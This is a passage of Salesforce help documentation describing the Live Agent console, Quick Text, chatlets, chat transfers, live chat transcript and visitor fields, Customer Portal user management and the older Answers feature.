• Select any link under Tools to access additional information about chats.

See Also:
Live Agent Overview
Live Chat Transcripts Overview
Live Chat Visitors Overview
Chatlet Overview
Viewing and Editing Live Chat Transcripts
Viewing and Editing Live Chat Visitors
Using the Live Agent Console
Using Live Agent in the Service Cloud Console

Quick Text Home

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Read” on Quick TextTo view the Quick Text tab:

“Create,” “Read,” “Edit,” and “Delete” on Quick TextTo create, edit, or deleteQuick Text messages:

You can access the Quick Text home page by clicking the Quick Text tab. From there, you can:

• Create Quick Text messages.

• View Quick Text messages.

1738

Live Agent OverviewResolving Customer Inquiries



• Access any Quick Text reports you’ve created.

Using the Live Agent Console
Use the Live Agent console to interact with customers via Web chat. You can sign in, set your status, answer incoming chat
requests, and interact with Salesforce data all within the Live Agent console.

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

Note: Starting with Spring ‘13, the Live Agent console isn’t available for new Live Agent customers. Existing
customers will continue to have access to the Live Agent console, and both new and existing customers can use Live
Agent in the Service Cloud console.

The Live Agent console is supported only for organizations using languages based on the Latin alphabet. Organizations that
use languages based on other alphabets, such as Chinese, Japanese, and Korean, should use Live Agent in the Service Cloud
console

Using the Live Agent console, you can:

• Chat with a visitor.

• Use the Quick Text sidebar to add pre-written messages to your chats.

• Use chatlets to view information about visitors, such as their geographic location, browsing histories, and information
about their computers.

• Search for visitor records in Salesforce, and review and update the information.

• Create a new record.

• Search for a Salesforce Knowledge article.

• Include information from an article in a chat response.

• Transfer a chat session to another agent.

• Switch your status from online to offline.

See Also:
Launching the Live Agent Console
Using Quick Text in the Live Agent Console
Transferring Chats
Live Agent Overview
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Launching the Live Agent Console

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Live Agent” is enabled and set up for the organizationTo launch the Live Agent console

Note: Starting with Spring ‘13, the Live Agent console isn’t available for new Live Agent customers. Existing
customers will continue to have access to the Live Agent console, and both new and existing customers can use Live
Agent in the Service Cloud console.

To launch the Live Agent console, click Launch Agent Console on the live agent home page.

The Live Agent console opens in a separate browser window. As long as the Live Agent console is open, you're logged in and
available to receive and respond to chat requests from visitors. Additionally, the console and Salesforce are “connected,” which
allows you to see account, contact, lead, case, and article information in the console during the chat. Likewise, chat transcript
and visitor records from each chat session are saved automatically in Salesforce.

See Also:
Using the Live Agent Console
Using Quick Text in the Live Agent Console
Chatting with Visitors in the Live Agent Console
Live Agent Home
Live Agent Overview

Chatting with Visitors in the Live Agent Console
Chatting with a visitor can involve more than just exchanging messages. You can also search for and modify visitor records,
and use articles to search for and share information.

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

Live Agent is enabled and set up

AND
You are assigned to at least one skill

To chat with visitors in the Live Agent console:
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Note: Starting with Spring ‘13, the Live Agent console isn’t available for new Live Agent customers. Existing
customers will continue to have access to the Live Agent console, and both new and existing customers can use Live
Agent in the Service Cloud console.

When a new chat request comes into your queue in the Live Agent console, it's highlighted by a blinking red bar in the chat
monitor.

1. Select the request and click Accept to answer it.
The request displays a green highlight and the live chat window becomes active.

2. Type your message in the chat text field and click Send or hit ENTER or RETURN on your keyboard.
Your message appears in the chat log area above the text field. The log displays all messages sent by you and the visitor.

3. Optionally, use the Bold, Italic, or Underline buttons to apply some formatting to your message.

Note that the formatting doesn't appear in the text field, but does in the chat window and the chat log.

4. Optionally:

• Use the CRM chatlet to search for information about the visitor in Salesforce or to edit information based on the chat.
• Search for a Knowledge article and include information from the article in the chat.
• Use Quick Text to include short pre-written messages in your chat. on page 1908
• Transfer the chat to another agent.

5. Click Close when the chat ends and then click Okay to confirm.

At the end of the chat, Salesforce automatically creates a transcript record that contains detailed information about the session
and the complete chat log. It also creates a new visitor record, or associates the transcript with an existing record if the visitor
is a repeat visitor.

See Also:
Chatlet Overview
Using the Live Agent Console
Using Quick Text in the Live Agent Console
Changing Your Live Agent Status
Transferring Chats
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Using Quick Text in the Live Agent Console

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Read” on Quick TextTo access Quick Text messages while chatting with visitors
in Live Agent:

Note: Starting with Spring ‘13, the Live Agent console isn’t available for new Live Agent customers. Existing
customers will continue to have access to the Live Agent console, and both new and existing customers can use Live
Agent in the Service Cloud console.

Quick Text helps you respond to customers more efficiently by letting you insert pre-written messages, such as greetings and
common troubleshooting steps, into customer communications like email and chats. The Quick Text sidebar in the Live Agent
console shows you the categories and messages you can choose.

Your administrator must give you access to Quick Text before you can use it.

To use Quick Text in the console:

1. While chatting with a customer, click  next to Select a category... in the sidebar.
2. Select a category.
3. To see a preview of a message, hover your mouse pointer over a message name.
4. Click the name of a message to add it to your chat.

Alternatively, you can select and add Quick Text messages directly from the chat text field. When you start typing, a list
of messages that include the words you type appears below the text box. Select a message from the list to add it to your
chat.

See Also:
Using the Live Agent Console
Quick Text Home
Using the Live Agent Console
Live Agent Home
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Using the CRM Chatlet
The CRM chatlet gives you Salesforce functionality right in the Live Agent console. Depending on your permissions, you
can search for, create, edit, or delete records.

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Read” on the objectTo search for and view a record:

“Create” on the objectTo create a new record:

“Edit” on the objectTo edit a record:

“Delete” on the objectTo delete a record:

Note: Starting with Spring ‘13, the Live Agent console isn’t available for new Live Agent customers. Existing
customers will continue to have access to the Live Agent console, and both new and existing customers can use Live
Agent in the Service Cloud console.

The chatlet makes it easy for you to get information during a chat session so that you can provide visitors with information,
make changes to their existing records, or create new records for them. For example, if a customer reports a problem that you
can't solve during the chat, you can create a new case for the customer and gather all required information during the session.

• To search for a record, enter a search term in the search field and click Search. Optionally, use the drop-down list to select
a specific type of record to search.

• To edit a record, first locate it using search, and then use inline editing to update the information. Click Save to save your
changes. Inline editing works very similarly in the Live Agent console as it does in Salesforce (with the exception that you
can't use the Esc key to undo changes in a field).

• To create a record, select the record type from the drop-down, and then click Create. Click Save to save the new record.

• To create a record associated with an existing record, click + at the top of the relevant related list. For example, to create
a new case associated with a contact, click + Case at the top of the Cases related list on the contact detail page.

• To delete a record, first locate it using search, and then click Delete.

• To close a record, click Cancel. Make sure to save your changes first.

Note:  Image files attached to records appear in the CRM chatlet as HTML. To see the images, you need to view
the records in Salesforce, not in the agent console.

See Also:
Chatlet Overview
Chatting with Visitors in the Live Agent Console
Using the Live Agent Console
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Using the Knowledge Chatlet
The Knowledge chatlet in the Live Agent console lets you search for articles to help you answer visitor questions. Additionally,
you can share information from articles with visitors during chats (if your administrator has enabled article information sharing).

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Read” on the article typeTo search for and view an article:

Note: Starting with Spring ‘13, the Live Agent console isn’t available for new Live Agent customers. Existing
customers will continue to have access to the Live Agent console, and both new and existing customers can use Live
Agent in the Service Cloud console.

To search for articles and share article text in the Live Agent console:

1. Click the Knowledge tab.
2. Enter keywords or phrases in the search field.
3. Optionally, click Filters +/- to use filtering criteria to further refine your search.

Filter options include article type, language, and categories.

4. Click Search Knowledge.
5. Click an article title to view the contents of the article.
6. Optionally, click Send Text to add information from the article directly to the chat.

See Also:
Chatlet Overview
Chatting with Visitors in the Live Agent Console
Using the Live Agent Console

1744

Using the Live Agent ConsoleResolving Customer Inquiries



Transferring Chats

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Live Agent” is enabled and set up for the organizationTo use the Live Agent console and transfer chat sessions:

“Live Agent” is enabled and set up

AND
Live Agent is set up in a Service Cloud console app

To use Live Agent in the Service Cloud console and transfer
chat sessions:

Note: Starting with Spring ‘13, the Live Agent console isn’t available for new Live Agent customers. Existing
customers will continue to have access to the Live Agent console, and both new and existing customers can use Live
Agent in the Service Cloud console.

You may need to transfer chat sessions to other agents if a customer has an issue another agent can solve, or because you need
to pass along some of your chat sessions to accept new requests. In the Live Agent console and Live Agent in the Service
Cloud console, you can transfer a chat session to a specific agent, or you can send a transfer request to all available agents with
a particular skill. When you transfer a chat to a skill group, it’s available to all online agents with that skill, regardless of their
capacities and how many active sessions they’re already engaged in.

1. While chatting with a customer, click Transfer.
2. Choose the skill group to which you want to transfer the chat, such as Billing or Technical Support.
3. Select All Qualified Agents to send the transfer request to all online agents in the skill group, or choose the name of a

specific agent.
4. If the transfer is accepted, you don’t need to do anything else. If it’s rejected, you can try transferring it to a different agent

or skill group.

See Also:
Using the Live Agent Console
Chatting with Visitors in the Live Agent Console
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Changing Your Live Agent Status

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

Note: Starting with Spring ‘13, the Live Agent console isn’t available for new Live Agent customers. Existing
customers will continue to have access to the Live Agent console, and both new and existing customers can use Live
Agent in the Service Cloud console.

Changing your status helps you control when you’re available to receive new and transferred chats. In the Live Agent console,
you can change your status to Online or Away, and you can log out of the console to change your status to Offline. In Live
Agent in the Service Cloud console, you can change your status to Online, Away, or Offline.

• To change your status in the Live Agent console, click your current status in the upper right of the console.

• To log out of the Live Agent console, click Exit.
• To change your status in Live Agent in the Service Cloud console, click Live Agent at the bottom right to open the chat

monitor, and then click your current status.

ResultsStatus

Chats can be routed to you, and you can accept incoming chats
and transfers.

Online

You can continue any chat sessions you’ve already started but
can’t accept incoming chats or transfers.

Away

No chats are routed to you, and you can’t accept incoming
chats or transfers.

Offline

When you exit the Live Agent console, your status changes to Offline and any active chat sessions end.

Note: If you log in to another Salesforce app while you’re logged in to a Service Cloud console app, you can’t accept
new chat requests.

See Also:
Chatting with Visitors in the Live Agent Console
Using the Live Agent Console
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Creating Live Chat Transcripts

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Create" on live chat transcriptsTo create live chat transcripts:

1. Click New next to Recent Live Chat Transcripts on the live chat transcripts home page.
2. Use the search lookup to find the visitor for the transcript.
3. Provide additional information about the transcript. See Live Chat Transcript Fields on page 1747.
4. In the Live Chat Transcript Information section, enter the conversation that occurred between the visitor and the agent.

Optionally, you can apply formatting to the text.
5. Click Save to save the transcript, or click Save & New to save the transcript and create another.

See Also:
Live Chat Transcript Fields
Viewing and Editing Live Chat Transcripts
Live Chat Transcripts Home
Live Agent Overview

Live Chat Transcript Fields

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

Live Chat Transcript Fields

A live chat transcript has the following fields, listed in alphabetical order. Depending on your page layout and field-level
security settings, some fields might not be visible or editable.

DefinitionField

The name of the account associated with the transcript.

During or after a chat, the agent can enter the account name
using the CRM Chatlet in the Live Agent console. During

Account Name

subsequent updates, you can enter or change the account name,
or select an account using the lookup icon.
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DefinitionField

The average time that it took an agent to respond to a visitor
comment.

Agent Average Response Time

The number of messages an agent sent during the chat.Agent Message Count

The skill associated with the live chat button used to initiate
the chat.

Agent Skill

The transcribed chat between an agent and a visitor.Body

The type and version of the browser used by the visitor.Browser

The visitor's browser language selection.Browser Language

The case associated with the chat.

During or after a chat, the agent can create a new case or
associate the chat with an existing one using the CRM Chatlet

Case

in the Live Agent console. During subsequent updates, you
can enter or change the case, or select a case using the lookup
icon.

The chat button that the visitor clicked to initiate the chat.Chat Button

The name of the contact that participated in the chat.

During or after a chat, the agent can enter the contact name
using the CRM Chatlet in the Live Agent console. During

Contact Name

subsequent updates, you can enter or change the contact name,
or select a contact using the lookup icon.

Note that contacts and visitors are not the same. See Live
Chat Visitor on page 1749 for more information.

The user who created the transcript, including creation date
and time. (Read only)

Created By

The date and time the transcript was created. (Read only)Created Date

The time the chat ended.End Time

Indicates whether the visitor or the agent ended the chat.Ended By

The user who last modified the transcript, including date and
time. (Read only)

Last Modified By

The date and time the transcript was last modified. (Read
only)

Last Modified Date

The name of the lead that was generated by the chat or
discussed during the chat.

During or after a chat, the agent can enter the lead using the
CRM Chatlet in the Live Agent console. During subsequent

Lead

updates, you can enter or change the lead, or select a lead using
the lookup icon.

The deployment from which the visitor initiated the chat.Deployment on page 2095
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DefinitionField

Unique, numerical identifier automatically assigned to the
transcript.

Administrators can modify the format and numbering for this
field.

Live Chat Transcript

Transcript numbers usually increase sequentially, but
sometimes they can skip numbers in a sequence.

Unique, numerical identifier automatically assigned to the
visitor.

Administrators can modify the format and numbering for this
field.

Live Chat Visitor

Visitor numbers usually increase sequentially, but sometimes
they can skip numbers in a sequence.

Note that visitors and contacts are different: a visitor might
be a contact, but this is not a requirement, and there is no
relationship between contacts and visitors.

The visitor's geographic location. Either the city and state, or
city and country (if the visitor is located outside of the United
States).

Location

The name of the transcript owner. By default, the owner is
the user who originally created the transcript (for example,
the agent who answered the chat).

You can select a different user as the owner, or assign the
transcript to a queue. When assigning transcripts to other

Owner

users, make sure those users have the “Read” permission on
live chat transcripts.

The user's operating system.Platform

Site the visitor was on before they came to your website.

For example, if the visitor used Google to search for your
organization's website, the referring site is Google.

Referring Site

The time that the visitor initially requested the chat.Request Time

The screen resolution used by the visitor.Screen Resolution

The time that the agent answered the chat request.Start Time

Completed, Dropped, or Missed. A missed chat was requested
but not answered.

Status

A string that identifies the type of browser and operating
system the visitor used.

User Agent

The average time that it took a visitor to respond to an agent
comment.

Visitor Average Response Time

The IP address of the computer that the visitor used during
the chat.

Visitor IP Address
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DefinitionField

The number of messages a visitor sent during the chat.Visitor Message Count

See Also:
Creating Live Chat Transcripts
Viewing and Editing Live Chat Transcripts
Live Chat Transcripts Home
Live Agent Overview

Viewing and Editing Live Chat Transcripts

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Read" on live chat transcriptsTo view live chat transcripts:

“Edit” on live chat transcriptsTo edit live chat transcripts:

When a chat session ends, a live chat transcript record is created automatically in Salesforce. The record contains all information
captured in the Live Agent console. If you have the appropriate permissions, you can edit the transcript information.

Once you've found the transcript you want to view or edit on the Live Chat Transcripts home page, click the transcript name
to display detailed information.

• Use inline editing to edit fields directly on the detail page. If inline editing isn’t enabled, contact your administrator.
• To display the page in edit mode, click Edit, make your changes, and click Save.
• To save the transcript, click Save, or click Save & New to save the changes and create a new transcript.
• To open a printable display of the record details, in the top-right corner of the page, click Printable View.
• The Live Chat Transcript Events related list shows a list of events, such as transfers, related to the transcript. Click an

event to view details about it. If you don’t see this list, you can add it to the Transcripts page by editing the page layout.

See Also:
Live Chat Transcript Fields
Creating Live Chat Transcripts
Live Chat Transcripts Home
Live Agent Overview
Live Chat Transcript Events
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Live Chat Transcript Events

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

A live chat transcript is a record of a chat between a visitor and a live chat agent. Salesforce creates a transcript automatically
for each chat session.

You can edit live chat transcripts to track events that occur between your agents and customers during live chats. You can add
the following events to a live chat transcript:

DescriptionEvent

Visitor requested a chat.Chat Requested

Chat request was placed in queue.Queued

Chat request was routed to agent.Routed (Push)

Chat request was routed to all available, qualified agents.Routed (Choice)

Chat request was accepted by agent.Accepted

Agent requested chat transfer.Transfer Requested

Chat transfer was accepted by agent.Transfer Accepted

Chat request was declined by agent.Declined (Manual)

Chat request timed out while assigned to agent.Declined (Timeout)

Chat request was canceled because no qualified agents were available.Canceled (No Agent)

Chat request was canceled because there was no room in queue.Canceled (No Queue)

Agent left chat.Agent Left

Visitor left chat.Visitor Left

Agent clicked End Chat.Ended by Agent

Visitor clicked End Chat.Ended by Visitor

Another event occurred.Other

See Also:
Setting Up Live Chat Transcripts
Live Chat Transcripts Overview
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Viewing and Editing Live Chat Visitors

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Read" on live chat visitorsTo view live chat visitors:

“Edit” on live chat visitorsTo edit live chat visitors:

Once you've found the visitor record you want to view or edit on the Live Chat Visitors home page, click the visitor name to
display detailed information.

• Use inline editing to edit fields directly on the detail page. If inline editing isn’t enabled, contact your administrator.
• To display the page in edit mode, click Edit, make your changes, and click Save.
• To save the transcript, click Save, or click Save & New to save the changes and create a new transcript.
• To open a printable display of the record details, in the top-right corner of the page, click Printable View.

See Also:
Live Chat Visitor Fields
Live Chat Transcripts Home
Chatting with Visitors in the Live Agent Console
Live Agent Overview

Live Chat Visitor Fields

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

Live Chat Visitor Fields

A live chat visitor record has the following fields, listed in alphabetical order. Depending on your page layout and field-level
security settings, some fields might not be visible or editable.

DefinitionField

The user who created the visitor, including creation date and
time. (Read only)

Created By

The date and time that the visitor was created. (Read only)Created Date
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DefinitionField

The user who last modified the visitor, including date and
time. (Read only)

Last Modified By

The date and time the visitor was last modified. (Read only)Last Modified Date

Unique, numerical identifier automatically assigned to the
visitor. (Read only)

Administrators can modify the format and numbering for this
field.

Live Chat Visitor

Visitor numbers usually increase sequentially, but sometimes
they can skip numbers in a sequence.

Note that visitors and contacts are different: a visitor might
be a contact, but this is not a requirement, and there is no
relationship between contacts and visitors.

Each new visitor is associated with a session key, which
Salesforce creates automatically. A session key is a unique ID,

Session Key

which is stored in the visitor record and on the visitor's PC as
a cookie. If a customer participates in multiple chats, Salesforce
uses the session key to link the customer to its visitor record,
associating that record to all related transcripts.

See Also:
Viewing and Editing Live Chat Visitors
Live Chat Visitors Home
Live Agent Overview

Viewing and Editing Quick Text Messages

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Read" on Quick TextTo view Quick Text messages:

“Edit” on Quick TextTo edit Quick Text messages:

“Delete” on Quick TextTo delete Quick Text messages:

The Quick Text tab displays a list of recent Quick Text messages. Click the name of any message to view its detail page, where
you can edit, delete, clone it, or change which support agents have access to it.
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Quick Text Detail Page

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Create,” “Read,” “Edit,” and “Delete” on Quick TextTo create, edit, or delete Quick Text messages:

You can access the detail page for any Quick Text message by clicking on the message on the Quick Text home page. From
the detail page for a message, you can:

• View detailed information about it.

• Edit or delete it.

• Clone it.

• Create or modify sharing rules for it.

• View a sample of the quick text populated with data from records you choose.

Quick Text Home

Live Agent is available in: Developer Edition organizations created after June 14, 2012

Live Agent is available for an additional cost in: Enterprise and Unlimited Editions

User Permissions Needed

“Read” on Quick TextTo view the Quick Text tab:

“Create,” “Read,” “Edit,” and “Delete” on Quick TextTo create, edit, or deleteQuick Text messages:

You can access the Quick Text home page by clicking the Quick Text tab. From there, you can:

• Create Quick Text messages.

• View Quick Text messages.

• Access any Quick Text reports you’ve created.
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Using the Channel Field in Quick Text

Available in: Group, Enterprise, Unlimited, and Developer Editions

Quick Text lets users create standard messages, such as greetings and answers to common questions, which support agents
can easily insert into communications with customers. The Channel field lets users designate which type of customer
communication a specific Quick Text message is available for use in. For example, you might create a series of short greetings
appropriate for use in chats and assign them to the Live Agent channel, or assign a series of longer, more detailed messages
to the Email channel so they’re available to support agents who communicate with customers through email in Case Feed.

Depending on the features that are enabled in your organization, such as Live Agent or Case Feed, certain values will
automatically appear as picklist options in the Channel field. While administrators can customize the names of these values,
we strongly recommend that you do not, as renaming standard values can prevent Quick Text messages from being available
in the correct channels.

REPLYING TO PORTALS AND WEB COMMUNITIES

Working with Customer Portal Users
Available in: Enterprise, Unlimited, and Developer Editions

Note: Starting with Summer ’13, the Customer Portal isn’t available for new organizations. Existing organizations
continue to have access to the Customer Portal. If you don’t have a Customer Portal, but want to easily share
information with your customers, try Communities.

Existing organizations using Customer Portals may continue to use their Customer Portals or transition to
Communities. Contact your Salesforce Account Executive for more information.

Note:  The Service Cloud Portal is the Customer Portal intended for many thousands to millions of users. Service
Cloud portal users are also referred to as high-volume portal users. See About High-Volume Portal Users (Service
Cloud Portal Users) on page 1969.

Some common tasks when managing Customer Portal users include:

• Setting up the Customer Portal for users

• Enabling Customer Portal users individually from the Contacts tab

• Disabling and deactivating Customer Portal users

• Changing Customer Portal users’ information and roles

• Changing Customer Portal users’ accounts

• Merging Customer Portal users

• Resetting Customer Portal users’ passwords

1755

Working with Customer Portal UsersResponding to Customers



• Viewing Customer Portal users’ user licenses

• Granting high-volume portal users access to object’s records

• Sharing high-volume portal users’ records with Salesforce users

• Managing Customer Portal users’ permissions and access settings

• Assigning profiles to a Customer Portal

• Delegating Customer Portal user management and case and contact management to portal users

• Reporting on Customer Portal users

Tip: To troubleshoot issues for Customer Portal users, click Manage External User and choose Log in to Portal as
User on the portal user’s contact detail page. This selection opens a new browser window and automatically logs you
into the portal as the portal user. This option also ensures that the portal is configured appropriately.

The Log in to Portal as User button is only available if you have the “Edit Self-Service Users” permission and “Edit”
access on the account. The Log in to Portal as User button does not display for inactive portal users.

Communicating with Customers via the Customer Portal
and Chatter Answers

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on casesTo create customer portal posts:

The portal publisher is your default option for responding to customers for cases that originated from a customer portal or
from a Chatter Answers community.

1. Click Answer Customer on the Case Feed page.

2. Click  and select Portal.
Depending on how your administrator has set up Case Feed, you may be able to click Portal without first having to click
Answer Customer.

3. Enter the message to the customer.
4. If you’re working on a case that was escalated from a question on Chatter Answers, choose Customer Only to post your

answer as a private reply, or choose Everyone to post it as a public reply.
5. Optionally, select Send Email to send a message to the customer letting them know that a reply to their question has

been posted to the portal.

Note:  This option is only available if your administrator has enabled it, and if the customer you’re replying to is
associated with the case and has a valid email address.

1756

Communicating with Customers via the Customer Portal and
Chatter Answers

Resolving Customer Inquiries



6. Click Answer via Portal. If you’re responding to a question publicly on Chatter Answers, this button is called Answer
via Community.

See Also:
Accessing Case Feed
Sending an Email from the Case Feed Page
Replying to an Email from the Case Feed Page
Creating Case Notes
Logging a Call
Case Feed Overview

Answers Overview
Answers is available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on questionsTo view the Answers tab:

“Create” on questionsTo ask and reply to questions:

“Read” on questionsTo vote for replies:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

Answers Terminology

The following terms are used when describing answers features and functionality:

Answers
Answers is a feature of the Community application that enables users to ask questions and have community members
post replies. Community members can then vote on the helpfulness of each reply, and the person who asked the question
can mark one reply as the best answer.

Best Answer
When a member of an answers community asks a question and other community members post a reply, the asker can
mark one of the replies as the best answer. The best answer then appears directly under the question (above the other
replies). Identifying the best answer helps other community members with the same question quickly find the most
relevant, useful information.
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Community
Communities are customizable public or private spaces for employees, end-customers, and partners to collaborate on
best practices and business processes.

Data Category for Answers
On the Answers tab, data categories allow users to classify questions in an answers zone. For example, if you have a zone
for hardware products, your data categories may include laptops, desktops, and printers. Zone members can quickly
browse within a specific category to find answers to their questions. Administrators can use data categories to control
access to questions.

Idea
Ideas are suggestions posted by the members of an ideas community and are organized by zones. For example, if the
focus of a particular zone is “Ideas for car features,” an appropriate idea for that zone might have the title “Insulated cup
holders that keep your beverage hot or cold.” Or, if the focus of a particular zone is “Ideas for our company's employee
benefits,” an appropriate idea for that zone might have the title “On-site day care.”

Question
An issue posted to an answers community. When a community member asks a question, other community members
post replies to help resolve the question.

Reply
The response to a question in an answers community. When community members reply to a question, the person who
asked the question can mark one of the replies as the best answer to resolve and close the question.

Vote, Reply
In an answers community, a vote means you either like or dislike a reply to a question.

Zone
Zones organize ideas and questions into logical groups, with each zone having its own focus and unique ideas and
questions.

Icon Descriptions

DescriptionIcon

A question that has been resolved. To resolve a question, the person who asked the question chooses
a reply as the best answer.

A question that community members have replied to. For example, this icon represents a question
with four replies. If a question has no replies, a “0” appears in this icon.

A reply to a question.

A reply that has been marked as the best answer to a question.
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Using Answers
Answers is available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on questionsTo view the Answers tab:

“Create” on questionsTo ask and reply to questions:

“Read” on questionsTo vote for replies:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

Answers is a feature of the Community application that enables users to ask questions and have community members post
replies. Community members can then vote on the helpfulness of each reply, and the person who asked the question can mark
one reply as the best answer.

On the Answers tab you can:

• Ask a question

• Find an answer to a question

• Reply to a question

• Vote for a reply

• Identify a reply as the best answer to your question

• View all of your questions and replies

• Convert a reply into an article in the knowledge base

• Escalate a question to a case

The right side of the answers home page provides a snapshot of recent activity by showing the most recently asked and the
most recently replied questions, as well as questions that have been open for more than a week.

Only administrators have full read, create, edit, and delete permissions for answers. Standard and portal users can delete their
own questions and replies if no one has replied or voted.

See Also:
Answers Overview
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Asking a Question

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on questionsTo view the Answers tab:

“Create” on questionsTo ask and reply to questions:

“Read” on questionsTo vote for replies:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

To ask a question:

1. From the Answers tab, enter your question and click Ask.

Salesforce searches the titles and descriptions of the other questions in the zone and lists ones that are similar to yours. If
your question has already been asked, click the question title to view the replies that other zone members have posted to
that question.

Alternatively, click Start Over to clear the similar questions results and ask another question.

2. If your question has not already been asked, click Continue.
3. Enter a description of your question. Use the HTML editor to format your text or upload an image.
4. Select a category for your question. If you do not assign a category, community members may have difficulty finding your

question, as they must use search or view all questions in the community.
5. Click Post Question.

After asking your question, wait for community members to post replies. Then you can choose a reply as the best answer to
resolve your question.

See Also:
Answers Overview
Using Answers
Replying to a Question
Escalating a Question to a Case
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Creating Questions from the Questions Tab

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on questionsTo view the Questions tab:

"Create” on questionsTo ask and reply to questions:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

Note:  Since your administrator determines the fields on questions, some fields might not be included in the following
steps.

You can use the Questions tab in both the application and the console to ask questions of the zones that you moderate and
manage. Asking community members for input or opinions is an easy way to assess interest in topics or create engagement in
the community.
To post a question to the community from the Questions tab:

1. Click New Question from the Questions list view page or click New from the Recent Questions list on the Questions
overview page.

2. Select a zone for your question.
3. Add a title for your question.
4. Optionally, enter a description of your question.

Use the rich text editor to format your text or upload an image. To ensure that your images appear correctly in the feed,
Salesforce recommends that they be less than 450 pixels wide.

5. Select a category for your question.

Questions must be assigned to a category to appear in the community. Questions that don’t have a category are still visible
to the owner of the question, but not to other members of the community.

6. Click Save.
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Editing and Deleting a Question

Answers is available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Edit” on questionsTo edit any question:

“Delete” on questionsTo delete any question:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

Standard users can delete their own questions if the questions have not received replies. Once a question receives a reply, the
owner of the question can no longer delete it. As the Salesforce administrator, you can edit or delete any question posted to
a community. For example, you may want to monitor your answers community and edit or delete questions that contain
inappropriate content or offensive language.

To edit or delete a question:

1. Click the question title to view the question detail page.
2. Click Edit or Delete at the top of the page. When editing a question, you can change the title or description and select a

different category for the question. When deleting a question, the question (and all associated replies) goes to the Recycle
Bin.

Another way to prevent offensive language is to create a validation rule that prevents users from entering specific words when
asking a question.

To create validation rules, from Setup, click Customize > Answers > Question > Validation Rules and Customize > Answers
> Reply > Validation Rules.
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Finding and Viewing Questions

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on questionsTo view the Answers tab:

“Create” on questionsTo ask and reply to questions:

“Read” on questionsTo vote for replies:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

There are a couple ways to find a question:

• Browse all questions within a community or category.

• Search for a question using the search field on the Answers tab. This field searches the title and description fields for both
questions and replies and displays matching results.

Once you've found your question, click the question title to view the question detail page, which lists all the replies for the
question. The question detail page lists the number of community members who liked and disliked each reply, and also shows
the best answer to the question (if one has been chosen).

From the question detail page, you can:

• Reply to the question.

• Vote for a reply.

